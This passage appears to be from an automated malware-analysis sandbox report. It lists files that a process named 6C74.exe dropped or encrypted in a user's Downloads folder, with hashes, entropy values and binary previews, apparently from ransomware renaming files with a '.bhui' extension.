SHA-512:	6ABB1A8BC0A875E86083E4C6E5AD7CD32BB30CC0189E1A513B0BD35C17AE18F074DBEFEF3BFE644874A78BC83A43296EABBA11D03E57408FF1005F6F6DE2E4CD
Malicious:	false
Reputation:	unknown
Preview:	NYMMP...._..T.L........@...7...L~C...:............[...lk...\....K.M.........:.._..jO...M....3.^..f{.1.......3...._..._-,.L!.5.G......\|.......m.V.....E.5...c&...=;.....:.g^w.cN...!TPY.6.J......}w.=.g~..h.7/.[..n...7.\|.+`...L....6....b.t.......l......\o.[..S.!..e.ka..H......T.>...._.6./...'.M..1q.-~vY.fc..#.8/)..0.6......(...X..<.7...cqQ...\|.\|"?[...t.E .K..u<C.H......J....W...}..IE..18...L k}...[.L`....>.,.LpMMLK.T.LV..Vd.....l.8.k..{-..-p}...8..w..Y!.8.....}.0....x;........G..Yv.KEE..sn:..m..=S.B..]....d.P.+."U?.\|....EM.....[...W.d.,O.S..6T.[.............(f..m.-e.....W....@.!..Y)[.>.G..S.{..c\|..(4.....w...$%.....H . ..[.SBc...?...c.I.F9.G.....N...t....a.y.l{.,.!..$&..y.v.JW.sS.......v..e..-)H.n.P...u..smb...`..x7..7...IG`l..\D:.............8=c...Y.A...l?..o.'.L<]....H..!y/.i..Z....F..>.....s.#...?......DyHK+..@2.r.:.r.q.ub...A.].b.y...\|..S ..[.l^q..:..a.......@<.....t& ..o.$%.M}./.h.mb...,.A..D....`..an[..+.v.M.Q...[.0~...I..4..J

C:\Users\user\Downloads\NYMMPCEIMA.docx.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.839391894670972
Encrypted:	false
SSDEEP:	24:RkD2JGX0sF0un7U3H6k9qK2TZJBsZ1tLQqHRQVLOK5rMdlW1bX4ZY82YQ8/WbD:7a0Zu7rkc1TZJBsHNjRQVLvKMEm+mD
MD5:	38A4D17E34864A0743C2FAC61B0818AE
SHA1:	8AE3A25A91B0FA4DA7388A6AF512B35FDC17F275
SHA-256:	8CE1A16B8CC12C30FD0A7FE1FB6867BA945266927990FF2AE06EE0D9A77D0444
SHA-512:	6ABB1A8BC0A875E86083E4C6E5AD7CD32BB30CC0189E1A513B0BD35C17AE18F074DBEFEF3BFE644874A78BC83A43296EABBA11D03E57408FF1005F6F6DE2E4CD
Malicious:	false
Reputation:	unknown
Preview:	NYMMP...._..T.L........@...7...L~C...:............[...lk...\....K.M.........:.._..jO...M....3.^..f{.1.......3...._..._-,.L!.5.G......\|.......m.V.....E.5...c&...=;.....:.g^w.cN...!TPY.6.J......}w.=.g~..h.7/.[..n...7.\|.+`...L....6....b.t.......l......\o.[..S.!..e.ka..H......T.>...._.6./...'.M..1q.-~vY.fc..#.8/)..0.6......(...X..<.7...cqQ...\|.\|"?[...t.E .K..u<C.H......J....W...}..IE..18...L k}...[.L`....>.,.LpMMLK.T.LV..Vd.....l.8.k..{-..-p}...8..w..Y!.8.....}.0....x;........G..Yv.KEE..sn:..m..=S.B..]....d.P.+."U?.\|....EM.....[...W.d.,O.S..6T.[.............(f..m.-e.....W....@.!..Y)[.>.G..S.{..c\|..(4.....w...$%.....H . ..[.SBc...?...c.I.F9.G.....N...t....a.y.l{.,.!..$&..y.v.JW.sS.......v..e..-)H.n.P...u..smb...`..x7..7...IG`l..\D:.............8=c...Y.A...l?..o.'.L<]....H..!y/.i..Z....F..>.....s.#...?......DyHK+..@2.r.:.r.q.ub...A.].b.y...\|..S ..[.l^q..:..a.......@<.....t& ..o.$%.M}./.h.mb...,.A..D....`..an[..+.v.M.Q...[.0~...I..4..J

C:\Users\user\Downloads\NYMMPCEIMA.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.864058747616285
Encrypted:	false
SSDEEP:	24:rNRFdNW3WY/+4rfTLaVlLgoHi6isQzealOOU4dXNNvT3ttnyVa7lQ1fRAv4HIpbQ:r3FduRG4bXaVlfHTitz1oOtVN9TdtX7m
MD5:	E1229D1614D064F02AAD54923650EF96
SHA1:	92E2DA5D4BDFEEF1C84748C5764325182D757CB8
SHA-256:	15540103F45E16FD393E5FA20A6A17A81E5BCA24C5497093EEACB47F7A535419
SHA-512:	9612D5AE5B0AEADABBB860772EEDEA045552192516B3AE5EFB70780C163BCA978FD079FD00484430A27161A84E92AD087555A70B6473D274C5C58FF1B77C76CE
Malicious:	false
Reputation:	unknown
Preview:	NYMMP..YN..M.....2..A~.j U.,........c.../.f...~~.e..j.c.-iO]C...E...0.t....+..2a.z.\|..1.x.;.<.0....;.=..?V.oWJKn..cB.5.._,...r@...i..6..s..k..b$75.....s..m.......W..w.Sr...jk7I.F.=..(.........v.Y...<.kt.......P.$o....c.Dr......t.q.G..,...'O..Y.....o.vj....i"..nr.....R.Rw...6...zx5...t..:.....S5..<.N. `9.....9..U..V9.T...m:.%.o........W..]..W.T...\...u...N.Q...i.....:......?/% ....:..g......-......NL......k.q...-..1...{j.w.0.D-...nj..Aa<....\.....U-[pG7Yy(.....Z.2...@W.^..h..@+.c\.T...@8.w.~.vs..p..a\|.....f.M...+.wv.(x..P.-..oQf..........}`...a..B..v..!.`n..fH`..S ...`..3_...f..(."...us..9B.x..s.T....S..x.e...33...LV.P..M!...v..c.......R\|N.6...Y@.L..=.B...N.e.....K..Hb..#3.N.4....".gy.+...<.d.B.X.tUR.3sfH...@0)....%):.=U..>.k.....+...R. .....;.t.>..\|....p21.f3!b...7..D.h.r....:.&u.,...........Y.4....C...J...2U.#.'c......"[[{..YD!..c.......x..bo.@.7.....2......-P...........R.Z}E..v.}.V.gj.....C..N..H.>...V..B...S.NH9?.)....l....N....'.D.

C:\Users\user\Downloads\NYMMPCEIMA.xlsx.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.864058747616285
Encrypted:	false
SSDEEP:	24:rNRFdNW3WY/+4rfTLaVlLgoHi6isQzealOOU4dXNNvT3ttnyVa7lQ1fRAv4HIpbQ:r3FduRG4bXaVlfHTitz1oOtVN9TdtX7m
MD5:	E1229D1614D064F02AAD54923650EF96
SHA1:	92E2DA5D4BDFEEF1C84748C5764325182D757CB8
SHA-256:	15540103F45E16FD393E5FA20A6A17A81E5BCA24C5497093EEACB47F7A535419
SHA-512:	9612D5AE5B0AEADABBB860772EEDEA045552192516B3AE5EFB70780C163BCA978FD079FD00484430A27161A84E92AD087555A70B6473D274C5C58FF1B77C76CE
Malicious:	false
Reputation:	unknown
Preview:	NYMMP..YN..M.....2..A~.j U.,........c.../.f...~~.e..j.c.-iO]C...E...0.t....+..2a.z.\|..1.x.;.<.0....;.=..?V.oWJKn..cB.5.._,...r@...i..6..s..k..b$75.....s..m.......W..w.Sr...jk7I.F.=..(.........v.Y...<.kt.......P.$o....c.Dr......t.q.G..,...'O..Y.....o.vj....i"..nr.....R.Rw...6...zx5...t..:.....S5..<.N. `9.....9..U..V9.T...m:.%.o........W..]..W.T...\...u...N.Q...i.....:......?/% ....:..g......-......NL......k.q...-..1...{j.w.0.D-...nj..Aa<....\.....U-[pG7Yy(.....Z.2...@W.^..h..@+.c\.T...@8.w.~.vs..p..a\|.....f.M...+.wv.(x..P.-..oQf..........}`...a..B..v..!.`n..fH`..S ...`..3_...f..(."...us..9B.x..s.T....S..x.e...33...LV.P..M!...v..c.......R\|N.6...Y@.L..=.B...N.e.....K..Hb..#3.N.4....".gy.+...<.d.B.X.tUR.3sfH...@0)....%):.=U..>.k.....+...R. .....;.t.>..\|....p21.f3!b...7..D.h.r....:.&u.,...........Y.4....C...J...2U.#.'c......"[[{..YD!..c.......x..bo.@.7.....2......-P...........R.Z}E..v.}.V.gj.....C..N..H.>...V..B...S.NH9?.)....l....N....'.D.

C:\Users\user\Downloads\QCOILOQIKC.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.87139450006572
Encrypted:	false
SSDEEP:	24:Alc95yPE0Zo8ux7XPweUTToL4oapMwp4Di5jCFhd3AVVv5vcQcmVWbD:9yPEso37fUTToLGpvFjCbd3AVfUlmSD
MD5:	8470DC0828590F27C02D662EB4EB703A
SHA1:	0BC7F3778A036BBE5694C0FFAE8A85E5F5E4475B
SHA-256:	264BC8C92114890C6208A64A3E70EC46676C1BB4B4B45ED88993AD76BA18A910
SHA-512:	7EEE52A43FA167E1020B32DB93CDAEC0433CD0E726B03DA54C212A36E17C83A9EA46E2309C69C8ADBB59BEC787B8935B3EECC0CEDFD50CF978FB9B34E18F25ED
Malicious:	false
Reputation:	unknown
Preview:	QCOIL.}.....1..IWL..E.p.$...V^...!`../T.^:L"..Ri,.'PvR../D`J...PGv;t.$b....'y...z".rv.)..'.....l.wnF.........O)G......?..f......2..sy.d.7.~.W..%...v.F..p..Xo\...2.G....3:C..hI."O..`.`Ez.,......_....Vx.?..F.:.U...U.I.\|)...\|.1.p....Q...2.z.\.Q....5.Ydfi..B..!.\|.B@.......m.K....1.....KX..$.ok.]..f...Zk..V..k#L.....$..1..-.z..sk..Dk...0.q.GsJ.A[C..P7..M._......Q.......x.mwiBA...!L...f..n...^@..\|..n;.u.&.QlJc.Yp....[...8...7U..M.\.V.C.y)D.AW... \|M...tu...o.[...z..[3{5xY...d. 9_.ow.Z.O..X.zy.T...h...r.6d...We...&T.....A.(...iB...K.<...F.N.G?9..........].r..%...?h.....0H.._f.Z.e8...(.Kkc...;a.W..J...L....W....%,(.&.\|r0.......y..KlL.<.:...\|....AI<,.#AC.UU.}.b....q'8.z..;e8.SF..J.F.X.......=.,e...A.....W$T....Np.....:C..<bT.o...\|[T..:...Vm$j.%%9X..p..e9....F}.2vv.4...A-..Y./.Ke .v..>.i.H.R...{T.X.. .@<.y1......U.r?....B.H...91..3.g....h....gK..'.....2sW.9Os.Tt...]r.....v....O....+.....PJ./5......~&.0...(.....;\~....ki.8.'rz.'3..!.318.0......m

C:\Users\user\Downloads\QCOILOQIKC.docx.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.87139450006572
Encrypted:	false
SSDEEP:	24:Alc95yPE0Zo8ux7XPweUTToL4oapMwp4Di5jCFhd3AVVv5vcQcmVWbD:9yPEso37fUTToLGpvFjCbd3AVfUlmSD
MD5:	8470DC0828590F27C02D662EB4EB703A
SHA1:	0BC7F3778A036BBE5694C0FFAE8A85E5F5E4475B
SHA-256:	264BC8C92114890C6208A64A3E70EC46676C1BB4B4B45ED88993AD76BA18A910
SHA-512:	7EEE52A43FA167E1020B32DB93CDAEC0433CD0E726B03DA54C212A36E17C83A9EA46E2309C69C8ADBB59BEC787B8935B3EECC0CEDFD50CF978FB9B34E18F25ED
Malicious:	false
Reputation:	unknown
Preview:	QCOIL.}.....1..IWL..E.p.$...V^...!`../T.^:L"..Ri,.'PvR../D`J...PGv;t.$b....'y...z".rv.)..'.....l.wnF.........O)G......?..f......2..sy.d.7.~.W..%...v.F..p..Xo\...2.G....3:C..hI."O..`.`Ez.,......_....Vx.?..F.:.U...U.I.\|)...\|.1.p....Q...2.z.\.Q....5.Ydfi..B..!.\|.B@.......m.K....1.....KX..$.ok.]..f...Zk..V..k#L.....$..1..-.z..sk..Dk...0.q.GsJ.A[C..P7..M._......Q.......x.mwiBA...!L...f..n...^@..\|..n;.u.&.QlJc.Yp....[...8...7U..M.\.V.C.y)D.AW... \|M...tu...o.[...z..[3{5xY...d. 9_.ow.Z.O..X.zy.T...h...r.6d...We...&T.....A.(...iB...K.<...F.N.G?9..........].r..%...?h.....0H.._f.Z.e8...(.Kkc...;a.W..J...L....W....%,(.&.\|r0.......y..KlL.<.:...\|....AI<,.#AC.UU.}.b....q'8.z..;e8.SF..J.F.X.......=.,e...A.....W$T....Np.....:C..<bT.o...\|[T..:...Vm$j.%%9X..p..e9....F}.2vv.4...A-..Y./.Ke .v..>.i.H.R...{T.X.. .@<.y1......U.r?....B.H...91..3.g....h....gK..'.....2sW.9Os.Tt...]r.....v....O....+.....PJ./5......~&.0...(.....;\~....ki.8.'rz.'3..!.318.0......m

C:\Users\user\Downloads\SNIPGPPREP.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.860180225519731
Encrypted:	false
SSDEEP:	24:Cm5wP/aqLbQcDpjR00HobsdDOxOMyOitfCLIe0a0wwM88k2e/8FTvMJIWbD:IPhIj0HobhOMyOiBF8kz8tvTkDD
MD5:	F7DD6E9D3306EDE3E9DEBF417F716AA2
SHA1:	0673AF59F8AD327D2AC2E4230F4EBAD46112A9D7
SHA-256:	E2E3FDB99F6C9E584D4B18933215D943A303FC01132ECDD4FB72A766E8920185
SHA-512:	B095B2C7F8E71EF88ADC80CCC8976BC14FDE5CB807AF6927394A83F39B7D8091B05876B950F2CE8B5842BA0796BCE8E3BD1751AC539FBF760664E59510F8661A
Malicious:	false
Reputation:	unknown
Preview:	SNIPG..%...x.K=.#r&...`..jG.V....8._O....2....l..d.._.....%...sLC..M.y.b)..}l..'.+@...j.......fUD.+...k.KV0......B'..p..Sk&.k.6...XDK..=..O.\|....q."..[.g...X. . t.....!A...b...#r...&Y.x.n..k......H.U.."..].=.."...(.d...y.b}3 .SK...f..."...LM...........''.-..!3.%.....D..Z.a...\..7...'...S..l<......N.......saOo{2......q.\La1A4..U..`?....S....q...1...=..........V9.!..!....'.f..TO4...E..B..a........,.....6......I..i.\|...as..nq...(.z._.....2.qB..h..W....@k01.5...r&6.G..v..O3r..H.....H;={<..\.za.P.ZPt0.$H.P)s...o....sK..]N..;<Q.Y.C.Q..._.b.L^M.[....[V..W..g.];..B...........?.mO7"J.C.)..@.-C..D.>.P)%m\|.Y......y?Z....O...P...^...\|...t..)....I...v..n@......../(...o.r,..."M.....>.&&.T.....].:xS.Y6.........P.j...p.....p+.v.'....9J.."..i.#a.k..._.q..w$-7..d...jJ....j;...nv..U.a*.A...E.....q#.C......A.......[.-....%.........R......$.Qd..l...E[?.Z.y....\F....~....g..E:.L.......6..Z......r]....Q.....b.4.ek>+$\|...1.OO.q.-.th.....+.<_.ZX.cG.i.

C:\Users\user\Downloads\SNIPGPPREP.png.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.860180225519731
Encrypted:	false
SSDEEP:	24:Cm5wP/aqLbQcDpjR00HobsdDOxOMyOitfCLIe0a0wwM88k2e/8FTvMJIWbD:IPhIj0HobhOMyOiBF8kz8tvTkDD
MD5:	F7DD6E9D3306EDE3E9DEBF417F716AA2
SHA1:	0673AF59F8AD327D2AC2E4230F4EBAD46112A9D7
SHA-256:	E2E3FDB99F6C9E584D4B18933215D943A303FC01132ECDD4FB72A766E8920185
SHA-512:	B095B2C7F8E71EF88ADC80CCC8976BC14FDE5CB807AF6927394A83F39B7D8091B05876B950F2CE8B5842BA0796BCE8E3BD1751AC539FBF760664E59510F8661A
Malicious:	false
Reputation:	unknown
Preview:	SNIPG..%...x.K=.#r&...`..jG.V....8._O....2....l..d.._.....%...sLC..M.y.b)..}l..'.+@...j.......fUD.+...k.KV0......B'..p..Sk&.k.6...XDK..=..O.\|....q."..[.g...X. . t.....!A...b...#r...&Y.x.n..k......H.U.."..].=.."...(.d...y.b}3 .SK...f..."...LM...........''.-..!3.%.....D..Z.a...\..7...'...S..l<......N.......saOo{2......q.\La1A4..U..`?....S....q...1...=..........V9.!..!....'.f..TO4...E..B..a........,.....6......I..i.\|...as..nq...(.z._.....2.qB..h..W....@k01.5...r&6.G..v..O3r..H.....H;={<..\.za.P.ZPt0.$H.P)s...o....sK..]N..;<Q.Y.C.Q..._.b.L^M.[....[V..W..g.];..B...........?.mO7"J.C.)..@.-C..D.>.P)%m\|.Y......y?Z....O...P...^...\|...t..)....I...v..n@......../(...o.r,..."M.....>.&&.T.....].:xS.Y6.........P.j...p.....p+.v.'....9J.."..i.#a.k..._.q..w$-7..d...jJ....j;...nv..U.a*.A...E.....q#.C......A.......[.-....%.........R......$.Qd..l...E[?.Z.y....\F....~....g..E:.L.......6..Z......r]....Q.....b.4.ek>+$\|...1.OO.q.-.th.....+.<_.ZX.cG.i.

C:\Users\user\Downloads\VWDFPKGDUF.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.850281726080851
Encrypted:	false
SSDEEP:	24:3O15NZRMdE720899gKj/zZAPe5o+5KKIM69e7vzcQ9X6x1oimEXCFVuUL7OWbD:3O151XrKjlAoo+uqm1oimEyKO77D
MD5:	A7346AA58DBC9DC837D2C66D8674E49B
SHA1:	EFD7F54DB89506C0572DF6191EE105AAE7956E0A
SHA-256:	0EC3AEBC32D1BB8DDF2C3F470AED25598890A9E03B9836E77CD7E2CE30342A6F
SHA-512:	5BF6CF2B07CAFD8928067890A836C023FA301D9CFA1C50AC82E5960C4E4C034158F7F812C56EE0EC95F6643814C0C52A017EF00A6A07F4AE435AB33633B1A53F
Malicious:	false
Reputation:	unknown
Preview:	VWDFP.....r.J~.......\|...........i..........\|..1.z.o.....^....i,....6.I.]@L..=,+.z.....s..^7...v\R.IC.8..[t......I.a0.b....b5Q..X....m~..O....vL...,.v.......~h.]B......8...A0S.H...WB..<.CJ... ]..EO hKG1.%.K.!.Ms.m.+.......(NP}J.=.........B..b..w....kH##..p)0w.(....7q....M.l.........(lh....y.&....s^..}...wk.\|....2...To.-PXG..4m...-.t.c"$.dx..`u.)x....E....w./,/ou..'J.!...}.[..h....8..wp..d5.Z.rN(o.\|i.F..,...y.D......[.....zcF...w....W....5...."\|e....E.\|..:.F..d..mv8....IT....+@.oxa..E..2....>PP.7...v2UP......+:..$..^.W....m.......;#"8D).A.....i.0.[2fco..b@.s~o.h.....y.f..8...T..#.:.;....I.....C.4.T....G.....(^.~u...7D".+/Q..(..=...9...Oi..t.B>...A.........C:>.D&....Wn...1q..J..l.i...6.....G...j{.....`.z/...CS.EQ.-.\.Z..w..U..sWO..&k...N1.%..&a.x.cV...m......?.%3..)^Nm1D..v4. .+['......R.lr.!..T..'..N;.0(..$....^eF$E..... .r.y$\...m.............;>......:.To.vN.u..$......q.o....h../O..SU..k%a.B.?.gN..j......i.. ..uK.Y.

C:\Users\user\Downloads\VWDFPKGDUF.jpg.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.850281726080851
Encrypted:	false
SSDEEP:	24:3O15NZRMdE720899gKj/zZAPe5o+5KKIM69e7vzcQ9X6x1oimEXCFVuUL7OWbD:3O151XrKjlAoo+uqm1oimEyKO77D
MD5:	A7346AA58DBC9DC837D2C66D8674E49B
SHA1:	EFD7F54DB89506C0572DF6191EE105AAE7956E0A
SHA-256:	0EC3AEBC32D1BB8DDF2C3F470AED25598890A9E03B9836E77CD7E2CE30342A6F
SHA-512:	5BF6CF2B07CAFD8928067890A836C023FA301D9CFA1C50AC82E5960C4E4C034158F7F812C56EE0EC95F6643814C0C52A017EF00A6A07F4AE435AB33633B1A53F
Malicious:	false
Reputation:	unknown
Preview:	VWDFP.....r.J~.......\|...........i..........\|..1.z.o.....^....i,....6.I.]@L..=,+.z.....s..^7...v\R.IC.8..[t......I.a0.b....b5Q..X....m~..O....vL...,.v.......~h.]B......8...A0S.H...WB..<.CJ... ]..EO hKG1.%.K.!.Ms.m.+.......(NP}J.=.........B..b..w....kH##..p)0w.(....7q....M.l.........(lh....y.&....s^..}...wk.\|....2...To.-PXG..4m...-.t.c"$.dx..`u.)x....E....w./,/ou..'J.!...}.[..h....8..wp..d5.Z.rN(o.\|i.F..,...y.D......[.....zcF...w....W....5...."\|e....E.\|..:.F..d..mv8....IT....+@.oxa..E..2....>PP.7...v2UP......+:..$..^.W....m.......;#"8D).A.....i.0.[2fco..b@.s~o.h.....y.f..8...T..#.:.;....I.....C.4.T....G.....(^.~u...7D".+/Q..(..=...9...Oi..t.B>...A.........C:>.D&....Wn...1q..J..l.i...6.....G...j{.....`.z/...CS.EQ.-.\.Z..w..U..sWO..&k...N1.%..&a.x.cV...m......?.%3..)^Nm1D..v4. .+['......R.lr.!..T..'..N;.0(..$....^eF$E..... .r.y$\...m.............;>......:.To.vN.u..$......q.o....h../O..SU..k%a.B.?.gN..j......i.. ..uK.Y.

C:\Users\user\Downloads\VWDFPKGDUF.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.856383657963231
Encrypted:	false
SSDEEP:	24:bexwhpwpMUnsNrOh5NrpJZ9jMpfVOnU+2evr7Xc6iyXHehbfxo9suYo1DrWbD:FhuNns9OFrpT9jwK7Xc6iNtoKKkD
MD5:	D51140CB44306DA44296BB002BE48291
SHA1:	AB4832952921EDB393DA7ACC4F69E7067A3EA864
SHA-256:	B8D3E8CF34DCB91983A47DDF8519A7CB70C53C3C2EB6A3C9728675F084F59533
SHA-512:	C3DDBBBCF705EC8AACAEB466E374852E6C857FC842318B3C53E8B4AEBFF8600198EAA5ED2426DE0A07DB27A58858FB7AB87EA8F9DF8836D0F5B43F3A8B76C07C
Malicious:	false
Reputation:	unknown
Preview:	VWDFP...9...d....P.A....f]....p...Hr..4.X6....ki.o.EG..dB....pB.^E;....V..W.3.G.h..d.....P..q.2........=3....^..).W.+..T.@&...d.....Lzq.....s.<...$.}.\|(....ZH.W......L1.p..'.\Gl.KL.Lv>]I\.z...U.z.'dr.!...vj..G.5Y.>i`E....N.`.2q...b.Rm..R$~8.b...-........T..iM..T~K`.....Y..+..Q.?.f..g..m.B.by..2....V.b].N....K..s(.. ......%.#U.'IY.....c.....6d!a..Y..2.f...4q....Y.V...{....YMKStM!.36g.mU..1...10... L.......`......U\|OG?:..9?.&.l..2-.%.#.n........i..n.Y$.._.u....X.=..p.....5...@.Hed..k9.\v@..%K.t.. ..T.............\.:..-..w.`.~b.].]v.h.Y...A......U.;.p..u....\|sy(.G.Y..OH......u........`q..J.zFY&.7.4...e...9..R.....u..O.5.r...R6..t..x...........Q".}.`l.K..]......K...`.Z2...w.S...Ez..;Km.Q..I...X.....T..8..r...7.......&.MDx..R....D.Y:....\|lT .jU..`.>}....$;..2..D..U..8.M9...$H.!)..U...}f...R..Et..QdLW:....n.u..0.`*..q..:S(H....,.......Z..7...]Z.D....L.&......../....R.J#.........y,...".v6....p.....nA.2.....a..}?,h........wm.@..._7.. .Hz.f..s,

C:\Users\user\Downloads\VWDFPKGDUF.mp3.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.856383657963231
Encrypted:	false
SSDEEP:	24:bexwhpwpMUnsNrOh5NrpJZ9jMpfVOnU+2evr7Xc6iyXHehbfxo9suYo1DrWbD:FhuNns9OFrpT9jwK7Xc6iNtoKKkD
MD5:	D51140CB44306DA44296BB002BE48291
SHA1:	AB4832952921EDB393DA7ACC4F69E7067A3EA864
SHA-256:	B8D3E8CF34DCB91983A47DDF8519A7CB70C53C3C2EB6A3C9728675F084F59533
SHA-512:	C3DDBBBCF705EC8AACAEB466E374852E6C857FC842318B3C53E8B4AEBFF8600198EAA5ED2426DE0A07DB27A58858FB7AB87EA8F9DF8836D0F5B43F3A8B76C07C
Malicious:	false
Reputation:	unknown
Preview:	VWDFP...9...d....P.A....f]....p...Hr..4.X6....ki.o.EG..dB....pB.^E;....V..W.3.G.h..d.....P..q.2........=3....^..).W.+..T.@&...d.....Lzq.....s.<...$.}.\|(....ZH.W......L1.p..'.\Gl.KL.Lv>]I\.z...U.z.'dr.!...vj..G.5Y.>i`E....N.`.2q...b.Rm..R$~8.b...-........T..iM..T~K`.....Y..+..Q.?.f..g..m.B.by..2....V.b].N....K..s(.. ......%.#U.'IY.....c.....6d!a..Y..2.f...4q....Y.V...{....YMKStM!.36g.mU..1...10... L.......`......U\|OG?:..9?.&.l..2-.%.#.n........i..n.Y$.._.u....X.=..p.....5...@.Hed..k9.\v@..%K.t.. ..T.............\.:..-..w.`.~b.].]v.h.Y...A......U.;.p..u....\|sy(.G.Y..OH......u........`q..J.zFY&.7.4...e...9..R.....u..O.5.r...R6..t..x...........Q".}.`l.K..]......K...`.Z2...w.S...Ez..;Km.Q..I...X.....T..8..r...7.......&.MDx..R....D.Y:....\|lT .jU..`.>}....$;..2..D..U..8.M9...$H.!)..U...}f...R..Et..QdLW:....n.u..0.`*..q..:S(H....,.......Z..7...]Z.D....L.&......../....R.J#.........y,...".v6....p.....nA.2.....a..}?,h........wm.@..._7.. .Hz.f..s,

C:\Users\user\Downloads\VWDFPKGDUF.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8442031049564145
Encrypted:	false
SSDEEP:	24:ds6i7iAcOh76vzUetyOIhacyEzEAZZMgQ3LpcugPKtDudjPCDNH79V7uBPKpWbD:dsr7pcG0Ej0Yh8LDgPAudjKRB4k2D
MD5:	47D89215806CADB528D824DA11D9ADF1
SHA1:	F08D0DF9345452A21E473B0D800BE03799458BEE
SHA-256:	E575E1379442D62F4AF330B2D3E12FE67C8B6242AA72303CDB29ACB25D82FBD9
SHA-512:	47C0ADFB284A2C7E123281BE6BED365852432274A8C9861881E737C40AD016895B14842D5AB2C0A58B96DA2B8E8A3ECAB73420CA70A07F14848FD07DE84665CC
Malicious:	false
Reputation:	unknown
Preview:	VWDFPp..q......e.h0RUI.[ ga#.........p.tR..F./.K.....,....g.....%.......g[.Scb.a:..........y....;..z.8.r6j..$,t.R..s.`b.n.....p..'Q...(U^\3...5x.....P.%K...1.....A..k..[.....3F%...KJ...Mp.Q....z.M..!".(?...K..~...O...{.3..GN.T..wG.[...F...ZL....s.;.z...w.%.......j.M...yl!...M....@...#.....y.8.@..L...P.r..t.?F.;s..%...g.....k^WU.p.'.....8....2..o.x....N...........i.jVe.D...E.PF.y].KwI....K...\.D..(,.k....[~.1.V..l.0}a..T. .C'.....F..}. z...]#!...\O.1-.).A0...].[rjAy.#.a.4.....-......./..}.._ntz.....E......idu....1.f.,.V..8..F.n..W{....]t.K3.pi...a..y9.8...@.....p..._E.o.b_...5V.Z.W.".ic>QdHv8..l.....u=....RK...).EW..Q ...4.p....9....F.._#C0.....kW...s...ku....I.Q.\|%.}.a^..3%....z...kK.:.r.s?......w.......!#..n.qE#../..]J"W..A.{...6....Z7...x.U.7ld.P..O..p"....z....X..LR.0...6..Q..o...'..M.I.~.._..gZ.l.bW.._ [.e...k0.:.G....r....=XG(K...VT.-JRt...z......d...r=tG.'-...(..3w*>.....$.2..O....@.)......J-.....<.m6.5...f...........P

C:\Users\user\Downloads\VWDFPKGDUF.pdf.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8442031049564145
Encrypted:	false
SSDEEP:	24:ds6i7iAcOh76vzUetyOIhacyEzEAZZMgQ3LpcugPKtDudjPCDNH79V7uBPKpWbD:dsr7pcG0Ej0Yh8LDgPAudjKRB4k2D
MD5:	47D89215806CADB528D824DA11D9ADF1
SHA1:	F08D0DF9345452A21E473B0D800BE03799458BEE
SHA-256:	E575E1379442D62F4AF330B2D3E12FE67C8B6242AA72303CDB29ACB25D82FBD9
SHA-512:	47C0ADFB284A2C7E123281BE6BED365852432274A8C9861881E737C40AD016895B14842D5AB2C0A58B96DA2B8E8A3ECAB73420CA70A07F14848FD07DE84665CC
Malicious:	false
Reputation:	unknown
Preview:	VWDFPp..q......e.h0RUI.[ ga#.........p.tR..F./.K.....,....g.....%.......g[.Scb.a:..........y....;..z.8.r6j..$,t.R..s.`b.n.....p..'Q...(U^\3...5x.....P.%K...1.....A..k..[.....3F%...KJ...Mp.Q....z.M..!".(?...K..~...O...{.3..GN.T..wG.[...F...ZL....s.;.z...w.%.......j.M...yl!...M....@...#.....y.8.@..L...P.r..t.?F.;s..%...g.....k^WU.p.'.....8....2..o.x....N...........i.jVe.D...E.PF.y].KwI....K...\.D..(,.k....[~.1.V..l.0}a..T. .C'.....F..}. z...]#!...\O.1-.).A0...].[rjAy.#.a.4.....-......./..}.._ntz.....E......idu....1.f.,.V..8..F.n..W{....]t.K3.pi...a..y9.8...@.....p..._E.o.b_...5V.Z.W.".ic>QdHv8..l.....u=....RK...).EW..Q ...4.p....9....F.._#C0.....kW...s...ku....I.Q.\|%.}.a^..3%....z...kK.:.r.s?......w.......!#..n.qE#../..]J"W..A.{...6....Z7...x.U.7ld.P..O..p"....z....X..LR.0...6..Q..o...'..M.I.~.._..gZ.l.bW.._ [.e...k0.:.G....r....=XG(K...VT.-JRt...z......d...r=tG.'-...(..3w*>.....$.2..O....@.)......J-.....<.m6.5...f...........P

C:\Users\user\Downloads\ZIPXYXWIOY.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8534004594616675
Encrypted:	false
SSDEEP:	24:ve7mcNnFc4CGgZeLXpAnmzz9xiKfCgGWh91Jbe/GdcZbiUN35WSOOWbD:m7BdFcggZeLLz9xtfCgVdc4yO7D
MD5:	1FC6CF639B7A65BF9C189535572B6C1E
